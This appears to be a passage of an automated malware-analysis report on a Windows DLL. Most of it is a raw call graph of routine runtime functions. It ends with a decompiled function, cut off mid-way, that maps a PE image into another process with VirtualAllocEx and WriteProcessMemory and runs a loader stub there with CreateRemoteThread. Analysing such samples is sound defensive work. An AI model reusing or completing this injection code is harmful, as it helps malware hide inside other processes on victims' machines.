SetLastError 5162->5166 5188 61402bd 5162->5188 5166->5159 5170 613cde0 5173 61402bd ___std_exception_copy 6 API calls 5170->5173 5171 613cdcf 5172 61402bd ___std_exception_copy 6 API calls 5171->5172 5174 613cddd 5172->5174 5175 613cdec 5173->5175 5178 613e946 ___free_lconv_mon 12 API calls 5174->5178 5176 613cdf0 5175->5176 5177 613ce07 5175->5177 5180 61402bd ___std_exception_copy 6 API calls 5176->5180 5200 613ca2b 5177->5200 5178->5166 5180->5174 5182 613e946 ___free_lconv_mon 12 API calls 5182->5166 5205 614002d 5183->5205 5185 614029a 5186 61402b5 TlsGetValue 5185->5186 5187 61402a3 5185->5187 5187->5162 5189 614002d ___std_exception_copy 5 API calls 5188->5189 5190 61402d9 5189->5190 5191 61402f7 TlsSetValue 5190->5191 5192 613cdb2 5190->5192 5192->5166 5193 613e7ca 5192->5193 5198 613e7d7 ___std_exception_copy 5193->5198 5194 613e817 5196 613027e ___std_exception_copy 13 API calls 5194->5196 5195 613e802 RtlAllocateHeap 5197 613cdc7 5195->5197 5195->5198 5196->5197 5197->5170 5197->5171 5198->5194 5198->5195 5219 6139184 5198->5219 5233 613c8bf 5200->5233 5206 614005b 5205->5206 5210 6140057 ___std_exception_copy 5205->5210 5206->5210 5211 613ff62 5206->5211 5209 6140075 GetProcAddress 5209->5210 5210->5185 5217 613ff73 ___vcrt_FlsFree 5211->5217 5212 613ff91 LoadLibraryExW 5214 6140010 5212->5214 5215 613ffac GetLastError 5212->5215 5213 6140009 5213->5209 5213->5210 5214->5213 5216 6140022 FreeLibrary 5214->5216 5215->5217 5216->5213 5217->5212 5217->5213 5218 613ffdf LoadLibraryExW 5217->5218 5218->5214 5218->5217 5222 61391b1 5219->5222 5223 61391bd ___scrt_is_nonwritable_in_current_image 5222->5223 5228 613173c EnterCriticalSection 5223->5228 5225 61391c8 5229 6139204 5225->5229 5228->5225 5232 6131784 LeaveCriticalSection 5229->5232 5231 613918f 5231->5198 5232->5231 5234 613c8cb ___scrt_is_nonwritable_in_current_image 5233->5234 5247 613173c EnterCriticalSection 5234->5247 5236 613c8d5 5248 613c905 5236->5248 5239 613c9d1 5240 613c9dd ___scrt_is_nonwritable_in_current_image 5239->5240 5252 613173c EnterCriticalSection 5240->5252 5242 613c9e7 5253 613cbb2 5242->5253 5244 613c9ff 5257 613ca1f 5244->5257 5247->5236 5251 6131784 LeaveCriticalSection 5248->5251 5250 613c8f3 5250->5239 5251->5250 5252->5242 5254 613cbe8 ___std_exception_copy 5253->5254 5255 613cbc1 ___std_exception_copy 5253->5255 5254->5244 5255->5254 5260 6147fef 5255->5260 5374 6131784 LeaveCriticalSection 5257->5374 5259 613ca0d 5259->5182 5261 614806f 5260->5261 5264 6148005 5260->5264 5263 613e946 ___free_lconv_mon 14 API calls 5261->5263 5286 61480bd 5261->5286 5265 6148091 5263->5265 5264->5261 5266 6148038 5264->5266 5270 613e946 ___free_lconv_mon 14 API calls 5264->5270 5267 613e946 ___free_lconv_mon 14 API calls 5265->5267 5274 613e946 ___free_lconv_mon 14 API calls 5266->5274 5287 614805a 5266->5287 5268 61480a4 5267->5268 5273 613e946 ___free_lconv_mon 14 API calls 5268->5273 5269 613e946 ___free_lconv_mon 14 API calls 5275 6148064 5269->5275 5272 614802d 5270->5272 5271 61480cb 5276 614812b 5271->5276 5285 613e946 14 API calls ___free_lconv_mon 5271->5285 5288 614830c 5272->5288 5278 61480b2 5273->5278 5279 614804f 5274->5279 5280 613e946 ___free_lconv_mon 14 API calls 5275->5280 5281 613e946 ___free_lconv_mon 14 API calls 5276->5281 5283 613e946 ___free_lconv_mon 14 API calls 5278->5283 5316 61487c0 5279->5316 5280->5261 5282 6148131 5281->5282 5282->5254 5283->5286 5285->5271 5328 6148160 5286->5328 5287->5269 5289 614831d 5288->5289 5315 6148406 5288->5315 5290 614832e 5289->5290 5291 613e946 ___free_lconv_mon 14 API calls 5289->5291 5292 6148340 5290->5292 5294 613e946 ___free_lconv_mon 14 API calls 5290->5294 5291->5290 5293 6148352 5292->5293 5295 613e946 ___free_lconv_mon 14 API calls 5292->5295 5296 6148364 5293->5296 5297 613e946 ___free_lconv_mon 14 API calls 5293->5297 5294->5292 5295->5293 5298 6148376 5296->5298 5299 613e946 ___free_lconv_mon 14 API calls 5296->5299 5297->5296 5300 6148388 5298->5300 5301 613e946 ___free_lconv_mon 14 API calls 5298->5301 5299->5298 5302 613e946 ___free_lconv_mon 14 API calls 5300->5302 5303 614839a 5300->5303 5301->5300 5302->5303 5304 613e946 ___free_lconv_mon 14 API calls 5303->5304 5306 61483ac 5303->5306 5304->5306 5305 61483be 5308 61483d0 5305->5308 5310 613e946 ___free_lconv_mon 14 API calls 5305->5310 5306->5305 5307 613e946 ___free_lconv_mon 14 API calls 5306->5307 5307->5305 5309 61483e2 5308->5309 5311 613e946 ___free_lconv_mon 14 API calls 5308->5311 5312 61483f4 5309->5312 5313 613e946 ___free_lconv_mon 14 API calls 5309->5313 5310->5308 5311->5309 5314 613e946 ___free_lconv_mon 14 API calls 5312->5314 5312->5315 5313->5312 5314->5315 5315->5266 5317 61487cd 5316->5317 5327 6148825 5316->5327 5318 61487dd 5317->5318 5319 613e946 ___free_lconv_mon 14 API calls 5317->5319 5320 61487ef 5318->5320 5321 613e946 ___free_lconv_mon 14 API calls 5318->5321 5319->5318 5322 6148801 5320->5322 5324 613e946 ___free_lconv_mon 14 API calls 5320->5324 5321->5320 5323 6148813 5322->5323 5325 613e946 ___free_lconv_mon 14 API calls 5322->5325 5326 613e946 ___free_lconv_mon 14 API calls 5323->5326 5323->5327 5324->5322 5325->5323 5326->5327 5327->5287 5329 614816d 5328->5329 5333 614818c 5328->5333 5329->5333 5334 6148cdb 5329->5334 5332 613e946 ___free_lconv_mon 14 API calls 5332->5333 5333->5271 5335 6148186 5334->5335 5336 6148cec 5334->5336 5335->5332 5370 6148a3a 5336->5370 5339 6148a3a ___std_exception_copy 14 API calls 5340 6148cff 5339->5340 5341 6148a3a ___std_exception_copy 14 API calls 5340->5341 5342 6148d0a 5341->5342 5343 6148a3a ___std_exception_copy 14 API calls 5342->5343 5344 6148d15 5343->5344 5345 6148a3a ___std_exception_copy 14 API calls 5344->5345 5346 6148d23 5345->5346 5347 613e946 ___free_lconv_mon 14 API calls 5346->5347 5348 6148d2e 5347->5348 5349 613e946 ___free_lconv_mon 14 API calls 5348->5349 5350 6148d39 5349->5350 5351 613e946 ___free_lconv_mon 14 API calls 5350->5351 5352 6148d44 5351->5352 5353 6148a3a ___std_exception_copy 14 API calls 5352->5353 5354 6148d52 5353->5354 5355 6148a3a ___std_exception_copy 14 API calls 5354->5355 5356 6148d60 5355->5356 5357 6148a3a ___std_exception_copy 14 API calls 5356->5357 5358 6148d71 5357->5358 5359 6148a3a ___std_exception_copy 14 API calls 5358->5359 5360 6148d7f 5359->5360 5361 6148a3a ___std_exception_copy 14 API calls 5360->5361 5362 6148d8d 5361->5362 5363 613e946 ___free_lconv_mon 14 API calls 5362->5363 5364 6148d98 5363->5364 5365 613e946 ___free_lconv_mon 14 API calls 5364->5365 5366 6148da3 5365->5366 5367 613e946 ___free_lconv_mon 14 API calls 5366->5367 5368 6148dae 5367->5368 5369 613e946 ___free_lconv_mon 14 API calls 5368->5369 5369->5335 5371 6148a4c 5370->5371 5372 6148a5b 5371->5372 5373 613e946 ___free_lconv_mon 14 API calls 5371->5373 5372->5339 5373->5371 5374->5259 6396 6150f66 6397 611c26c _ValidateLocalCookies 5 API calls 6396->6397 6398 6150f79 6397->6398 5667 611bf09 5668 611bf14 5667->5668 5669 611bf47 5667->5669 5671 611bf39 5668->5671 5672 611bf19 5668->5672 5670 611c063 __DllMainCRTStartup@12 100 API calls 5669->5670 5678 611bf23 5670->5678 5679 611bf5c 5671->5679 5674 611bf2f 5672->5674 5675 611bf1e 5672->5675 5698 611bc4c 5674->5698 5675->5678 5693 611bc6b 5675->5693 5680 611bf68 ___scrt_is_nonwritable_in_current_image 5679->5680 5706 611bcdc 5680->5706 5682 611bf6f __DllMainCRTStartup@12 5683 611bf96 5682->5683 5684 611c05b 5682->5684 5690 611bfd2 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 5682->5690 5714 611bc3e 5683->5714 5686 611cb7f __DllMainCRTStartup@12 4 API calls 5684->5686 5687 611c062 5686->5687 5688 611bfa5 __RTC_Initialize 5688->5690 5717 611bee8 InitializeSListHead 5688->5717 5690->5678 5691 611bfb3 5691->5690 5718 611bc13 5691->5718 5767 613a334 5693->5767 5856 612019d 5698->5856 5703 611bc68 5703->5678 5704 61201a8 21 API calls 5705 611bc55 5704->5705 5705->5678 5707 611bce5 5706->5707 5722 611cca2 IsProcessorFeaturePresent 5707->5722 5711 611bcf6 5712 611bcfa 5711->5712 5713 61201b3 ___scrt_uninitialize_crt 7 API calls 5711->5713 5712->5682 5713->5712 5761 611bd15 5714->5761 5716 611bc45 5716->5688 5717->5691 5719 611bc18 ___scrt_release_startup_lock 5718->5719 5720 611cca2 IsProcessorFeaturePresent 5719->5720 5721 611bc21 5719->5721 5720->5721 5721->5690 5723 611bcf1 5722->5723 5724 612017e 5723->5724 5732 61279f7 5724->5732 5728 612018f 5729 612019a 5728->5729 5730 6127a48 ___vcrt_uninitialize_locks DeleteCriticalSection 5728->5730 5729->5711 5731 6120187 5730->5731 5731->5711 5733 6127a00 5732->5733 5735 6127a29 5733->5735 5736 6120183 5733->5736 5746 6127c66 5733->5746 5737 6127a48 ___vcrt_uninitialize_locks DeleteCriticalSection 5735->5737 5736->5731 5738 6126aad 5736->5738 5737->5736 5751 6127b77 5738->5751 5741 6126ac2 5741->5728 5744 6126add 5744->5728 5745 6126ae0 ___vcrt_uninitialize_ptd 6 API calls 5745->5741 5747 6127a8c ___vcrt_FlsFree 5 API calls 5746->5747 5748 6127c80 5747->5748 5749 6127c9e InitializeCriticalSectionAndSpinCount 5748->5749 5750 6127c89 5748->5750 5749->5750 5750->5733 5752 6127a8c ___vcrt_FlsFree 5 API calls 5751->5752 5753 6127b91 5752->5753 5754 6127baa TlsAlloc 5753->5754 5755 6126ab7 5753->5755 5755->5741 5756 6127c28 5755->5756 5757 6127a8c ___vcrt_FlsFree 5 API calls 5756->5757 5758 6127c42 5757->5758 5759 6127c5d TlsSetValue 5758->5759 5760 6126ad0 5758->5760 5759->5760 5760->5744 5760->5745 5762 611bd21 5761->5762 5763 611bd25 5761->5763 5762->5716 5764 611bd32 ___scrt_release_startup_lock 5763->5764 5765 611cb7f __DllMainCRTStartup@12 4 API calls 5763->5765 5764->5716 5766 611bd9b 5765->5766 5773 613cbfd 5767->5773 5770 61201a8 5839 61269a0 5770->5839 5774 613cc07 5773->5774 5777 611bc70 5773->5777 5775 614027e ___std_exception_copy 6 API calls 5774->5775 5776 613cc0e 5775->5776 5776->5777 5778 61402bd ___std_exception_copy 6 API calls 5776->5778 5777->5770 5779 613cc21 5778->5779 5781 613cac4 5779->5781 5782 613cacf 5781->5782 5786 613cadf 5781->5786 5787 613cae5 5782->5787 5785 613e946 ___free_lconv_mon 14 API calls 5785->5786 5786->5777 5788 613cb00 5787->5788 5789 613cafa 5787->5789 5790 613e946 ___free_lconv_mon 14 API calls 5788->5790 5791 613e946 ___free_lconv_mon 14 API calls 5789->5791 5792 613cb0c 5790->5792 5791->5788 5793 613e946 ___free_lconv_mon 14 API calls 5792->5793 5794 613cb17 5793->5794 5795 613e946 ___free_lconv_mon 14 API calls 5794->5795 5796 613cb22 5795->5796 5797 613e946 ___free_lconv_mon 14 API calls 5796->5797 5798 613cb2d 5797->5798 5799 613e946 ___free_lconv_mon 14 API calls 5798->5799 5800 613cb38 5799->5800 5801 613e946 ___free_lconv_mon 14 API calls 5800->5801 5802 613cb43 5801->5802 5803 613e946 ___free_lconv_mon 14 API calls 5802->5803 5804 613cb4e 5803->5804 5805 613e946 ___free_lconv_mon 14 API calls 5804->5805 5806 613cb59 5805->5806 5807 613e946 ___free_lconv_mon 14 API calls 5806->5807 5808 613cb67 5807->5808 5813 613c911 5808->5813 5814 613c91d ___scrt_is_nonwritable_in_current_image 5813->5814 5829 613173c EnterCriticalSection 5814->5829 5816 613c927 5819 613e946 ___free_lconv_mon 14 API calls 5816->5819 5820 613c951 5816->5820 5819->5820 5830 613c970 5820->5830 5821 613c97c 5822 613c988 ___scrt_is_nonwritable_in_current_image 5821->5822 5834 613173c EnterCriticalSection 5822->5834 5824 613c992 5825 613cbb2 ___std_exception_copy 14 API calls 5824->5825 5826 613c9a5 5825->5826 5835 613c9c5 5826->5835 5829->5816 5833 6131784 LeaveCriticalSection 5830->5833 5832 613c95e 5832->5821 5833->5832 5834->5824 5838 6131784 LeaveCriticalSection 5835->5838 5837 613c9b3 5837->5785 5838->5837 5840 61269ad 5839->5840 5846 611bc75 5839->5846 5841 61269bb 5840->5841 5847 6127bed 5840->5847 5842 6127c28 ___vcrt_FlsSetValue 6 API calls 5841->5842 5844 61269cb 5842->5844 5852 6126984 5844->5852 5846->5678 5848 6127a8c ___vcrt_FlsFree 5 API calls 5847->5848 5849 6127c07 5848->5849 5850 6127c1f TlsGetValue 5849->5850 5851 6127c13 5849->5851 5850->5851 5851->5841 5853 612699b 5852->5853 5854 612698e 5852->5854 5853->5846 5854->5853 5855 612af01 ___std_exception_copy 14 API calls 5854->5855 5855->5853 5862 61269e4 5856->5862 5858 611bc51 5858->5705 5859 613a329 5858->5859 5860 613cd7a ___std_exception_copy 14 API calls 5859->5860 5861 611bc5d 5860->5861 5861->5703 5861->5704 5863 61269f0 GetLastError 5862->5863 5864 61269ed 5862->5864 5865 6127bed ___vcrt_FlsGetValue 6 API calls 5863->5865 5864->5858 5866 6126a05 5865->5866 5867 6126a24 5866->5867 5868 6126a6a SetLastError 5866->5868 5869 6127c28 ___vcrt_FlsSetValue 6 API calls 5866->5869 5867->5868 5868->5858 5870 6126a1e 5869->5870 5870->5867 5871 6126a46 5870->5871 5872 6127c28 ___vcrt_FlsSetValue 6 API calls 5870->5872 5873 6127c28 ___vcrt_FlsSetValue 6 API calls 5871->5873 5874 6126a5a 5871->5874 5872->5871 5873->5874 5875 612af01 ___std_exception_copy 14 API calls 5874->5875 5875->5867 6222 615210c 6223 611c26c _ValidateLocalCookies 5 API calls 6222->6223 6224 6152122 6223->6224 6225 611c26c _ValidateLocalCookies 5 API calls 6224->6225 6226 615212c 6225->6226 5876 612bb4e 5877 612bb5a ___scrt_is_nonwritable_in_current_image 5876->5877 5878 612bb61 GetLastError ExitThread 5877->5878 5879 612bb6e 5877->5879 5890 613cc29 GetLastError 5879->5890 5884 612bb8a 5922 612bd2d 5884->5922 5891 613cc45 5890->5891 5892 613cc3f 5890->5892 5894 61402bd ___std_exception_copy 6 API calls 5891->5894 5896 613cc49 SetLastError 5891->5896 5893 614027e ___std_exception_copy 6 API calls 5892->5893 5893->5891 5895 613cc61 5894->5895 5895->5896 5898 613e7ca ___std_exception_copy 14 API calls 5895->5898 5900 612bb73 5896->5900 5901 613ccde 5896->5901 5899 613cc76 5898->5899 5903 613cc8f 5899->5903 5904 613cc7e 5899->5904 5917 6140a23 5900->5917 5928 612c0c3 5901->5928 5905 61402bd ___std_exception_copy 6 API calls 5903->5905 5907 61402bd ___std_exception_copy 6 API calls 5904->5907 5908 613cc9b 5905->5908 5909 613cc8c 5907->5909 5910 613ccb6 5908->5910 5911 613cc9f 5908->5911 5913 613e946 ___free_lconv_mon 14 API calls 5909->5913 5914 613ca2b ___std_exception_copy 14 API calls 5910->5914 5912 61402bd ___std_exception_copy 6 API calls 5911->5912 5912->5909 5913->5896 5915 613ccc1 5914->5915 5916 613e946 ___free_lconv_mon 14 API calls 5915->5916 5916->5896 5918 6140a35 GetPEB 5917->5918 5921 612bb7e 5917->5921 5919 6140a48 5918->5919 5918->5921 6070 61400f0 5919->6070 5921->5884 5925 6140566 5921->5925 6073 612bc03 5922->6073 5924 612bd3a 5926 614002d ___std_exception_copy 5 API calls 5925->5926 5927 6140582 5926->5927 5927->5884 5939 61415c5 5928->5939 5932 612c0fc 5975 61396e2 5932->5975 5933 612c0dd IsProcessorFeaturePresent 5936 612c0e9 5933->5936 5935 612c0d3 5935->5932 5935->5933 5969 612b856 5936->5969 5978 61414f7 5939->5978 5942 614160a 5943 6141616 ___scrt_is_nonwritable_in_current_image 5942->5943 5944 613cd7a ___std_exception_copy 14 API calls 5943->5944 5945 614163d ___std_exception_copy 5943->5945 5949 6141643 ___std_exception_copy 5943->5949 5944->5945 5946 614168a 5945->5946 5945->5949 5968 6141674 5945->5968 5947 613027e ___std_exception_copy 14 API calls 5946->5947 5948 614168f 5947->5948 5989 612ba52 5948->5989 5951 61416b6 5949->5951 5992 613173c EnterCriticalSection 5949->5992 5954 61416f8 5951->5954 5955 61417e9 5951->5955 5965 6141727 5951->5965 5960 613cc29 ___std_exception_copy 41 API calls 5954->5960 5954->5965 5957 61417f4 5955->5957 5997 6131784 LeaveCriticalSection 5955->5997 5959 61396e2 ___std_exception_copy 23 API calls 5957->5959 5961 61417fc 5959->5961 5963 614171c 5960->5963 5962 613cc29 ___std_exception_copy 41 API calls 5966 614177c 5962->5966 5964 613cc29 ___std_exception_copy 41 API calls 5963->5964 5964->5965 5993 6141796 5965->5993 5967 613cc29 ___std_exception_copy 41 API calls 5966->5967 5966->5968 5967->5968 5968->5935 5970 612b872 __DllMainCRTStartup@12 5969->5970 5971 612b89e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5970->5971 5974 612b96f __DllMainCRTStartup@12 5971->5974 5973 612b98d 5973->5932 6062 611c26c 5974->6062 5976 6139515 __DllMainCRTStartup@12 23 API calls 5975->5976 5977 612c106 5976->5977 5979 6141503 ___scrt_is_nonwritable_in_current_image 5978->5979 5984 613173c EnterCriticalSection 5979->5984 5981 6141511 5985 614154f 5981->5985 5984->5981 5988 6131784 LeaveCriticalSection 5985->5988 5987 612c0c8 5987->5935 5987->5942 5988->5987 5998 612b99e 5989->5998 5992->5951 5994 614176d 5993->5994 5995 614179c 5993->5995 5994->5962 5994->5966 5994->5968 6061 6131784 LeaveCriticalSection 5995->6061 5997->5957 5999 612b9b0 ___std_exception_copy 5998->5999 6004 612b9d5 5999->6004 6001 612b9c8 6015 6127d7b 6001->6015 6005 612b9ec 6004->6005 6006 612b9e5 6004->6006 6011 612b9fa 6005->6011 6025 612b82d 6005->6025 6021 6127ee4 GetLastError 6006->6021 6009 612ba21 6009->6011 6028 612ba7f IsProcessorFeaturePresent 6009->6028 6011->6001 6012 612ba51 6013 612b99e ___std_exception_copy 41 API calls 6012->6013 6014 612ba5e 6013->6014 6014->6001 6016 6127d87 6015->6016 6017 6127d9e 6016->6017 6054 6127f2a 6016->6054 6018 6127db1 6017->6018 6020 6127f2a ___std_exception_copy 41 API calls 6017->6020 6018->5968 6020->6018 6022 6127efd 6021->6022 6032 613ce2b 6022->6032 6026 612b851 6025->6026 6027 612b838 GetLastError SetLastError 6025->6027 6026->6009 6027->6009 6029 612ba8b 6028->6029 6030 612b856 ___std_exception_copy 8 API calls 6029->6030 6031 612baa0 GetCurrentProcess TerminateProcess 6030->6031 6031->6012 6033 613ce44 6032->6033 6034 613ce3e 6032->6034 6035 61402bd ___std_exception_copy 6 API calls 6033->6035 6040 6127f15 SetLastError 6033->6040 6036 614027e ___std_exception_copy 6 API calls 6034->6036 6037 613ce5e 6035->6037 6036->6033 6038 613e7ca ___std_exception_copy 14 API calls 6037->6038 6037->6040 6039 613ce6e 6038->6039 6041 613ce76 6039->6041 6042 613ce8b 6039->6042 6040->6005 6043 61402bd ___std_exception_copy 6 API calls 6041->6043 6044 61402bd ___std_exception_copy 6 API calls 6042->6044 6045 613ce82 6043->6045 6046 613ce97 6044->6046 6051 613e946 ___free_lconv_mon 14 API calls 6045->6051 6047 613ce9b 6046->6047 6048 613ceaa 6046->6048 6049 61402bd ___std_exception_copy 6 API calls 6047->6049 6050 613ca2b ___std_exception_copy 14 API calls 6048->6050 6049->6045 6052 613ceb5 6050->6052 6051->6040 6053 613e946 ___free_lconv_mon 14 API calls 6052->6053 6053->6040 6055 6127f34 6054->6055 6056 6127f3d 6054->6056 6057 6127ee4 ___std_exception_copy 16 API calls 6055->6057 6056->6017 6058 6127f39 6057->6058 6058->6056 6059 612c0c3 ___std_exception_copy 41 API calls 6058->6059 6060 6127f46 ___std_exception_copy 6059->6060 6060->6017 6061->5994 6063 611c275 IsProcessorFeaturePresent 6062->6063 6064 611c274 6062->6064 6066 611c8d2 6063->6066 6064->5973 6069 611c895 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6066->6069 6068 611c9b5 6068->5973 6069->6068 6071 614002d ___std_exception_copy 5 API calls 6070->6071 6072 614010c 6071->6072 6072->5921 6074 613cd7a ___std_exception_copy 14 API calls 6073->6074 6076 612bc0e 6074->6076 6075 612bc50 ExitThread 6076->6075 6077 612bc27 6076->6077 6082 61405a1 6076->6082 6079 612bc3a 6077->6079 6080 612bc33 CloseHandle 6077->6080 6079->6075 6081 612bc46 FreeLibraryAndExitThread 6079->6081 6080->6079 6081->6075 6083 614002d ___std_exception_copy 5 API calls 6082->6083 6084 61405ba 6083->6084 6084->6077 6227 6141488 6228 6141494 ___scrt_is_nonwritable_in_current_image 6227->6228 6235 613173c EnterCriticalSection 6228->6235 6230 614149f 6236 6140b6f 6230->6236 6235->6230 6255 6140aeb 6236->6255 6238 6140b87 6239 6140b90 6238->6239 6240 6140d7e 6238->6240 6243 6140bc0 6239->6243 6244 6140cba 6239->6244 6246 6140cb5 6239->6246 6241 612ba7f ___std_exception_copy 11 API calls 6240->6241 6242 6140d88 6241->6242 6262 6140d89 6243->6262 6245 6140d89 41 API calls 6244->6245 6247 6140ce0 6245->6247 6252 61414d3 6246->6252 6249 6140d89 41 API calls 6247->6249 6249->6246 6251 6140d89 41 API calls 6251->6246 6276 6131784 LeaveCriticalSection 6252->6276 6254 61414be 6256 6140af7 6255->6256 6257 6140b0c 6255->6257 6258 613027e ___std_exception_copy 14 API calls 6256->6258 6257->6238 6259 6140afc 6258->6259 6260 612ba52 ___std_exception_copy 41 API calls 6259->6260 6261 6140b07 6260->6261 6261->6238 6263 6140da0 6262->6263 6266 6140c3c 6263->6266 6269 6140b17 6263->6269 6265 6140e76 6265->6266 6267 612ba7f ___std_exception_copy 11 API calls 6265->6267 6266->6251 6268 6140ec8 6267->6268 6270 6140b23 6269->6270 6271 6140b38 6269->6271 6272 613027e ___std_exception_copy 14 API calls 6270->6272 6271->6265 6273 6140b28 6272->6273 6274 612ba52 ___std_exception_copy 41 API calls 6273->6274 6275 6140b33 6274->6275 6275->6265 6276->6254

                                                                                                                                      Control-flow Graph

                                                                                                                                      C-Code - Quality: 45%
                                                                                                                                      			E00E21700(void* _a4, void* _a8, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                                      				_Unknown_base(*)()* _v8;
                                                                                                                                      				void* _v12;
                                                                                                                                      				struct HINSTANCE__* _v16;
                                                                                                                                      				void* _v20;
                                                                                                                                      				intOrPtr _v24;
                                                                                                                                      				void* _v28;
                                                                                                                                      				DWORD* _v32;
                                                                                                                                      				_Unknown_base(*)()* _v36;
                                                                                                                                      				DWORD* _v40;
                                                                                                                                      				signed short* _v44;
                                                                                                                                      				DWORD* _v48;
                                                                                                                                      				_Unknown_base(*)()* _v52;
                                                                                                                                      				DWORD* _v56;
                                                                                                                                      				void* _v60;
                                                                                                                                      				long _v64;
                                                                                                                                      				long _v68;
                                                                                                                                      				_Unknown_base(*)()* _v72;
                                                                                                                                      				_Unknown_base(*)()* _v76;
                                                                                                                                      				_Unknown_base(*)()* _v80;
                                                                                                                                      				_Unknown_base(*)()* _v84;
                                                                                                                                      				_Unknown_base(*)()* _v88;
                                                                                                                                      				intOrPtr _v92;
                                                                                                                                      				intOrPtr _v96;
                                                                                                                                      				intOrPtr _v100;
                                                                                                                                      				void* _v104;
                                                                                                                                      				intOrPtr _v108;
                                                                                                                                      				void _v112;
                                                                                                                                      				intOrPtr _v116;
                                                                                                                                      				intOrPtr _v120;
                                                                                                                                      				DWORD* _v124;
                                                                                                                                      				intOrPtr _v128;
                                                                                                                                      				intOrPtr _v132;
                                                                                                                                      				void _v136;
                                                                                                                                      				_Unknown_base(*)()* _v140;
                                                                                                                                      				void* _t208;
                                                                                                                                      
                                                                                                                                      				_v32 = 0;
                                                                                                                                      				_v40 = 0;
                                                                                                                                      				_v44 = 0;
                                                                                                                                      				_v12 = 0;
                                                                                                                                      				_v16 = LoadLibraryA("kernel32.dll");
                                                                                                                                      				if(_v16 != 0) {
                                                                                                                                      					_v52 = GetProcAddress(_v16, "VirtualAllocEx");
                                                                                                                                      					_v72 = GetProcAddress(_v16, "VirtualProtectEx");
                                                                                                                                      					_v36 = GetProcAddress(_v16, "WriteProcessMemory");
                                                                                                                                      					_v8 = GetProcAddress(_v16, "VirtualFreeEx");
                                                                                                                                      					_v76 = GetProcAddress(_v16, "CloseHandle");
                                                                                                                                      					_v80 = GetProcAddress(_v16, "GetExitCodeProcess");
                                                                                                                                      					_v84 = GetProcAddress(_v16, "ReadProcessMemory");
                                                                                                                                      					_v88 = GetProcAddress(_v16, "Sleep");
                                                                                                                                      					_v140 = GetProcAddress(_v16, "FreeLibrary");
                                                                                                                                      				}
                                                                                                                                      				if(( *_a8 & 0x0000ffff) == 0x5a4d) {
                                                                                                                                      					_v32 = _a8 +  *((intOrPtr*)(_a8 + 0x3c));
                                                                                                                                      					_v40 =  &(_v32[6]);
                                                                                                                                      					_v44 =  &(_v32[1]);
                                                                                                                                      					if(( *_v44 & 0x0000ffff) == 0x14c) {
                                                                                                                                      						_v12 = VirtualAllocEx(_a4, 0, _v40[0xe], 0x3000, 4);
                                                                                                                                      						if(_v12 != 0) {
                                                                                                                                      							_v68 = 0;
                                                                                                                                      							VirtualProtectEx(_a4, _v12, _v40[0xe], 0x40,  &_v68);
                                                                                                                                      							_v112 = 0;
                                                                                                                                      							_v108 = 0;
                                                                                                                                      							_v104 = 0;
                                                                                                                                      							_v100 = 0;
                                                                                                                                      							_v96 = 0;
                                                                                                                                      							_v92 = 0;
                                                                                                                                      							_v112 = LoadLibraryA;
                                                                                                                                      							_v108 = GetProcAddress;
                                                                                                                                      							_v104 = _v12;
                                                                                                                                      							_v96 = _a28;
                                                                                                                                      							_v92 = _a32;
                                                                                                                                      							if(WriteProcessMemory(_a4, _v12, _a8, 0x1000, 0) != 0) {
                                                                                                                                      								_t73 = (_v32[5] & 0x0000ffff) + 0x18; // 0x18
                                                                                                                                      								_v24 = _v32 + _t73;
                                                                                                                                      								_v48 = 0;
                                                                                                                                      								while(_v48 != (_v44[0] & 0x0000ffff)) {
                                                                                                                                      									if( *(_v24 + 0x10) == 0 || WriteProcessMemory(_a4, _v12 +  *((intOrPtr*)(_v24 + 0xc)), _a8 +  *((intOrPtr*)(_v24 + 0x14)),  *(_v24 + 0x10), 0) != 0) {
                                                                                                                                      										_v48 =  &(_v48[0]);
                                                                                                                                      										_v24 = _v24 + 0x28;
                                                                                                                                      										continue;
                                                                                                                                      									} else {
                                                                                                                                      										_v8(_a4, _v12, 0, 0x8000);
                                                                                                                                      										return 0;
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      								_v20 = VirtualAllocEx(_a4, 0, 0x18, 0x3000, 4);
                                                                                                                                      								if(_v20 != 0) {
                                                                                                                                      									if(WriteProcessMemory(_a4, _v20,  &_v112, 0x18, 0) != 0) {
                                                                                                                                      										_v28 = VirtualAllocEx(_a4, 0, 0x1000, 0x3000, 0x40);
                                                                                                                                      										if(_v28 != 0) {
                                                                                                                                      											if(WriteProcessMemory(_a4, _v28, E00E21BA0, 0x1000, 0) != 0) {
                                                                                                                                      												_t208 = CreateRemoteThread(_a4, 0, 0, _v28, _v20, 0, 0); // executed
                                                                                                                                      												_v60 = _t208;
                                                                                                                                      												if(_v60 != 0) {
                                                                                                                                      													_v76(_v60);
                                                                                                                                      													_v56 = 0;
                                                                                                                                      													while(_v56 == 0) {
                                                                                                                                      														_v64 = 0;
                                                                                                                                      														GetExitCodeProcess(_a4,  &_v64);
                                                                                                                                      														if(_v64 == 0x103) {
                                                                                                                                      															_v136 = 0;
                                                                                                                                      															_v132 = 0;
                                                                                                                                      															_v128 = 0;
                                                                                                                                      															_v124 = 0;
                                                                                                                                      															_v120 = 0;
                                                                                                                                      															_v116 = 0;
                                                                                                                                      															ReadProcessMemory(_a4, _v20,  &_v136, 0x18, 0);
                                                                                                                                      															_v56 = _v124;
                                                                                                                                      															if(_v56 != 0x404040) {
                                                                                                                                      																Sleep(0xa);
                                                                                                                                      																continue;
                                                                                                                                      															}
                                                                                                                                      															_v8(_a4, _v12, 0, 0x8000);
                                                                                                                                      															_v8(_a4, _v20, 0, 0x8000);
                                                                                                                                      															_v8(_a4, _v28, 0, 0x8000);
                                                                                                                                      															return 0;
                                                                                                                                      														}
                                                                                                                                      														return 0;
                                                                                                                                      													}
                                                                                                                                      													return 1;
                                                                                                                                      												}
                                                                                                                                      												_v8(_a4, _v12, 0, 0x8000);
                                                                                                                                      												_v8(_a4, _v20, 0, 0x8000);
                                                                                                                                      												_v8(_a4, _v28, 0, 0x8000);
                                                                                                                                      												return 0;
                                                                                                                                      											}
                                                                                                                                      											_v8(_a4, _v12, 0, 0x8000);
                                                                                                                                      											_v8(_a4, _v20, 0, 0x8000);
                                                                                                                                      											_v8(_a4, _v28, 0, 0x8000);
                                                                                                                                      											return 0;
                                                                                                                                      										}
                                                                                                                                      										_v8(_a4, _v12, 0, 0x8000);
                                                                                                                                      										_v8(_a4, _v20, 0, 0x8000);
                                                                                                                                      										return 0;
                                                                                                                                      									}
